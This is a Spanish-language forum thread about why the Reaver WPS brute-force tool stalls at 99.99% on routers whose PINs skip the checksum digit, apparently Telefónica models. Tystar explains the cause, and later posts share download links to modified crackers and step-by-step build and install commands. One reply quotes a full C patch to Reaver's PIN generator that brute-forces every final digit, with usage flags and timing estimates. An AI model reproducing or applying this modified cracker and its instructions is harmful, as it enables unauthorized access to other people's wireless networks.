Autor Tema: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).  (Leído 34936 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Tystar

  • Visitante
Hola,

He visto en otros post que la gente pide una "actualización de reaver que corrija el bug del 99.99%". Comentar que NO ES UN BUG DEL REAVER.

Explico. El reaver fue diseñado para sacar claves WPS que cumplan con la regla de 7+checksum, es decir, si la clave es 01234567, los siete primeros son la clave y el octavo se genera a partir de calculos realizados con los otros siete. Que quiere decir esto? Que cualquier valor no sirve (en teoría) como clave. De hecho si se usa el comando -p XXXXXXXX y se pone un pin de 8 dígitos, probablemente veremos como nos cambia el último dígito.

Pues bien, que ocurre si los routers permiten poner cualquier clave WPS de 8 dígitos, aunque no se respete el checksum? Pues que te encontraras con que el reaver no encontrará jamás la segunda parte de la clave y tendrás el problema del 99,99%.

El reaver genera pines entre el 0000000X y el 9999999X, siendo el último el checksum. Si el valor que tiene el router no está entre esos números, se queda al 99,99% y no termina. Eso ocurre mucho con los routers de telefónica.

Solución? En su día yo cambié el código del reaver y lo volví a compilar, para que  en lugar de generarme el checksum, el último digito siempre fuera 0, entonces barrió todos los valores entre 00000000 a 99999990. Como ya tenía la primera parte de la clave, pongamos que era AAAA, pues me barrió entre los valores AAAA0000 a AAAA9990.

No encontré el WPS, volví a cambiar el código para que buscara los acabados en "1". Entonces barrió entre el AAAA0001 al AAAA9991. Tuve suerte y el PIN estaba entre esos valores.

Conclusión: El reaver no tiene un "bug" que se queda colgado al 99,99%, simplemente hemos tenido la mala suerte de toparnos con un router que tiene un pin que no cumple la regla de 7 digitos + checksum (XXXXXXX+Y).

Espero con esto ayudar a disipar la espera de la gente a que salga un Reaver que arregle ese "bug".



Desconectado sanson

  • Moderador Global
  • *
  • Mensajes: 8419
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #1 en: 20-11-2012, 14:07 (Martes) »
hola

ok gracias por la info

lo muevo a wifislax

saludos

crislgga

  • Visitante
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #2 en: 20-11-2012, 17:18 (Martes) »
hola, el "bug" que comentas es cierto, el router ADB de telefonica no cumple con la norma wps, de 7 digitos, os alegro el dia que en otro foro, ya han hecho una compilacion de wpscrack, y una version previa para reaver que segun ya usuarios funciona correctamente, no se si es correcto comentar info de ese foro, pero buscad, por que ya es posible, a lo mejor el router ADB, no es el unico

Shyraz

  • Visitante
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #3 en: 21-11-2012, 18:10 (Miércoles) »
Gracias Tystar por la explicación, y como diría KOKE : "una cosilla q se me viene a la cabeza...", cuando reaver alcanza el 99'99%, y se hace "la picha un lio" para seguir,  quiere decir q los 7 primeros dígitos del pin si son correctos? es q aunque he leido tu explicación,  pues de programación ni idea...

Imagino q la deducción q acabo de exponer no es correcta, verdad??


maseross

  • Visitante
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #4 en: 21-11-2012, 21:58 (Miércoles) »
Significa que los cuatro primeros son correctos pero como ha probado ya todas las posibilidades y no lo ha encontrado cree que esta al 99,99%
Si tuvieras 7 digitos solo te faltaría probar 9 combinaciones pero no es así.
« Última modificación: 21-11-2012, 21:59 (Miércoles) por maseross »

Shyraz

  • Visitante
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #5 en: 22-11-2012, 00:44 (Jueves) »
Significa que los cuatro primeros son correctos pero como ha probado ya todas las posibilidades y no lo ha encontrado cree que esta al 99,99%
Si tuvieras 7 digitos solo te faltaría probar 9 combinaciones pero no es así.

Tiene sentido, en ese caso "sólo" faltarían 10.000 posibilidades por probar... ^-^

Carpena

  • Visitante
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #6 en: 23-11-2012, 22:34 (Viernes) »
a ver es verdad que ha salido un codigo nuevo que evita el cheksum y se soluciona el problema del 99,99% pero esta en python, cuelgo el enlace de descarga y que alguien nos enseñe a usarlo en por ejemplo wifiway 3.4
https://www.dropbox.com/s/vrr70im38s2iyf4/wpscrack-BF.py

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14479
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #7 en: 23-11-2012, 22:48 (Viernes) »
a ver es verdad que ha salido un codigo nuevo que evita el cheksum y se soluciona el problema del 99,99% pero esta en python, cuelgo el enlace de descarga y que alguien nos enseñe a usarlo en por ejemplo wifiway 3.4
https://www.dropbox.com/s/vrr70im38s2iyf4/wpscrack-BF.py

wifiway es demasiado viejo , ...no digo que no se pueda, pero facil no sera.

veo mas viable en wifislax ...que lleva python mas nuevo y bastantes bindings ...y ya lleva scapy y demas.


Carpena

  • Visitante
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #8 en: 24-11-2012, 01:39 (Sábado) »
bueno pues que alguien ponga un resumen de como hacerlo con wifislax o el sistema operativo que prefiera, que seria muy interesante

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14479
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #9 en: 24-11-2012, 04:22 (Sábado) »
en wifislax 4.3 SOLO SE NECESITA pycrypto2.6   ^-^

popeye7

  • Visitante
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #10 en: 24-11-2012, 10:32 (Sábado) »
Buenas  , ¿seía posible hacer un módulo de este reaver modificado para bssid 8c:0c:a3 ?.Desonozco si sería una buena idea colocarlo en la carpeta opcional de wifislax 4.3 .
En distros basadas en ubuntu  me ha funcionado instalando un archivo comprimido que hay por la red
denominado reaver-1.4_BBSID_8c-0c-a3 .
Saludos

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14479
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #11 en: 24-11-2012, 12:38 (Sábado) »
Buenas  , ¿seía posible hacer un módulo de este reaver modificado para bssid 8c:0c:a3 ?.Desonozco si sería una buena idea colocarlo en la carpeta opcional de wifislax 4.3 .
En distros basadas en ubuntu  me ha funcionado instalando un archivo comprimido que hay por la red
denominado reaver-1.4_BBSID_8c-0c-a3 .
Saludos

mmmm , en la carpeta optional ...no se me habia ocurrido hacerlo asi.

tened en cuenta esto ...yo lo testee , y contra un router que cumpla la norma wps ....este MOD , no funciono bien.

pero en optional ....mmm , como ultima opcion si reaver original se queda "out" ...en el 99%.....

aunque es un coñazo estar cambiando de version...

popeye7

  • Visitante
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #12 en: 24-11-2012, 12:45 (Sábado) »
con ultraiso y maquina virtual , sin problemas . En las otras formas tienes razon.

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14479
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #13 en: 24-11-2012, 12:50 (Sábado) »
el principal problema esta en que ese codigo a sido modificado y publicado en un foro ENEMIGO , el cual no estaria visto con buenos ojos ponerlo en la live , ni bien visto aqui ni alli.

dejando eso de lado , puedo hacer 2 cosas

1-escribir exactamente como se instala ..algo que aun asi habria quien no supiese.
2-os hago el modulo lo publico como modulo extra y ya se lo baja quien quiera


en la iso de serie esta muy complicado meterlo por enemistades.

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14479
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #14 en: 24-11-2012, 12:52 (Sábado) »
inclusive podria publicarse en este hilo para no dejaros tirados del todo.

me refiero al xzm ...

aun y con todas voy a pedir consejo , ya que yo aqui no pinto.

popeye7

  • Visitante
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #15 en: 24-11-2012, 13:10 (Sábado) »
Yo sin meterme en profindidades , lo veo como al que le gusta el futbol ,disfruta del buen futbol aunque en su corazon tenga unos colores  . Resumiendo las cosas bien hechas estan bien hechas independientemente de quien las haga . Muchos de los aficionados a este mundillo visitan y son miembros de otros foros wireless españoles y extranjeros . He leido en el foro al que te refieres gente demandando un modulo de este reaver modificad0 para tus distros. En definitiva , creo que a los que nos gusta esto tenemo un foro preferido pero visitamos otros , esa es mi opinion .

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14479
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #16 en: 24-11-2012, 13:41 (Sábado) »
hay os dejo el xzm subido a multiupload..

no se lo que durara la descarga , por que al ser un servicio gratuito pues acaban borrando los ficheros asi que..

http://www.multiupload.nl/8KLLFYFDIZ

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14479
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #17 en: 24-11-2012, 13:51 (Sábado) »
para los que quieran instalarlo a mano es muy sencillo.


extraen el contenido del archivo comprimido...

exploran carpetas hasta ver la que pone src , ...hay click derecho sobre esa carpeta..abrir terminal aqui.


cuando se abre la shell , vemos que pone

wifislax src#

o similar,...


en el terminal...


Código: [Seleccionar]
./configure --prefix=/usr --sysconfdir=/etc
seguramente os diga que no teneis permiso ...bien entrar a src buscad el fichero configure..click derecho en permisos marcar casilla es ejecutable ....colcer a ejecutar

Código: [Seleccionar]
./configure --prefix=/usr --sysconfdir=/etc
se configurara el paquete.

Código: [Seleccionar]
make
Código: [Seleccionar]
make install
con eso lo habremos instalado.

___________________________________________________________________

mision 2 , salvarlo en un xzm

crear en escritorio una carpeta con un nombre sin espacios

por ejemplo

Código: [Seleccionar]
reaver_mod
abrimos dolphin o entramos a home ...

nos dirigimos a

Código: [Seleccionar]
/mnt/live/memory/changes
alli se escriben los cambios del sistema..como la instalacion de reaver.


alli veremos varias carpetas...nos interesan

Código: [Seleccionar]
etc y usr
click derecho , copiar

y pegais dentro de nuestra carpeta

reaver_mod


ahora explorad las carpetas que habeis copiado ...

en etc debedia dejar SOLO

reaver.db

es decir dejaremos

Código: [Seleccionar]
/etc/reaver/reaver.db
y en usr dejaremos solo

Código: [Seleccionar]
/usr/bin/reaver
/usr/bin/wash


cuando hemos dejado solo esos tres ficheros en sus carpètas ..ya entonces solo queda crear xzm


click derecho sobre nuestra carpeta reaver_mod , crear xzm ...

y mision cumplida.


m.k.

  • Visitante
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #18 en: 24-11-2012, 17:31 (Sábado) »
Hola.

Mirando en la solucion de problemas de REAVER en la pagina del proyecto http://code.google.com/p/reaver-wps/ he visto un comentario que da solución al error del 99.99%. para que no compruebe el cheksum del último digito.

http://code.google.com/p/reaver-wps/issues/detail?id=195#c41

Citar
Comment 41 by stefano....@gmail.com, Oct 22, 2012

I'm proud of you Tystar!
You tried harder than anybody else looking for the insight and then you saw the light.
So it's time to show that light to all the masses.

Assumptions:
-the router accepts WPS transaction so it's not giving you continuously "timeout".
-you know the first 4 digits of the pin (for example 0123 or 1234 or whatever)
retrieve these information using original reaver before applying the modification.
---------------------------------------------------------------------------------------------
download reaver:
svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only

open the file /root/reaver-wps-read-only/src/pin.c with a text editor
(save a copy you will need it to reinstall original reaver)
after #include "pins.h" SUBSTITUTE THE FIRST FUNCTION WITH THIS SAME FUNCTION (modified):

/* EXHAUSTIVE MOD. init */
/*
 * in these lines trivial modifications are applied over the original code.
 * these lines have to be considered for demonstration purpose only.
 * WPA PSK retrieval is not granted.
 * http://code.google.com/p/reaver-wps/issues/detail?id=195
 */

/* set global vars */
int exhaustive_last_digit = 9;
int exhaustive_index = 000;

/* Builds a WPS PIN from the key tables */
char *build_wps_pin()
{
        char *key = NULL, *pin = NULL;
        int pin_len = PIN_SIZE + 1;

        pin = malloc(pin_len);
        key = malloc(pin_len);
        if(pin && key)
        {
                memset(key, 0, pin_len);
                memset(pin, 0, pin_len);
      
                /* Generate a 7-digit pin */
                snprintf(key, pin_len, "%s%s", get_p1(get_p1_index()), get_p2(exhaustive_index));
            
                /* Append last digit */
                snprintf(pin, pin_len, "%s%d", key, exhaustive_last_digit);

                free(key);

      if(exhaustive_last_digit==0)
      {
         if(exhaustive_index==999)
         {
            cprintf(CRITICAL, "[-] Failed to recover WPS pin. \n");
            /* Clean up and get out */
            globule_deinit();
            exit(EXIT_FAILURE);         
         }
         exhaustive_index++;
         exhaustive_last_digit=9;
      }else{
         exhaustive_last_digit--;
      }
        }

        return pin;
}

/* EXHAUSTIVE MOD. end */

-actual reaver have to be uninstalled:

cd /root/reaver-wps-read-only/src
./configure
make distclean

-modified reaver have to be installed:

cd /root/reaver-wps-read-only/src
./configure
make
make install
---------------------------------------------------------------------------------------------
call reaver with the option -p 0123 where "0123" are the pin first 4 digits.
if you don't specify these 4 digits worst-case will take at least 10 years (3sec/pin * 10^8pin).
using the right 4 digits worst-case will take at least 10 hours (3sec/pin * 10^4).

to reinstall original reaver:
substitute modified pins.c with the original pins.c that you kept safe somewhere.
uninstall and install with same commands as above.


Viene a decir que en el REAVER original en el archivo pin.c se sustituya una parte del codigo por el modificado por STEFANO.

Imagino que esto será la modificación que han hecho en el foro "ENEMIGO"

Saludos




linesguapo

  • Visitante
Re: Reaver y su "bug" del 99,99% (no es un bug, aqui lo explico).
« Respuesta #19 en: 24-11-2012, 17:36 (Sábado) »
Esto intentado instalarlo, pero no me cuadra mucho con la estructura de mi sistema.

Te cuento, lo estoy intentando instalar en una Live de wifislax 4.2 si no me equivoco, es la ultima.

He encontrado la Carpeta src la he encontrado en esta ruta usr/src pero dentro de esa carpeta solo hay una llamada Linux-3.3.8 y si en tro de esta o hay ninguna llamada Configure.

Te importaría aclararlo para la 4.2

Muchas gracias por todo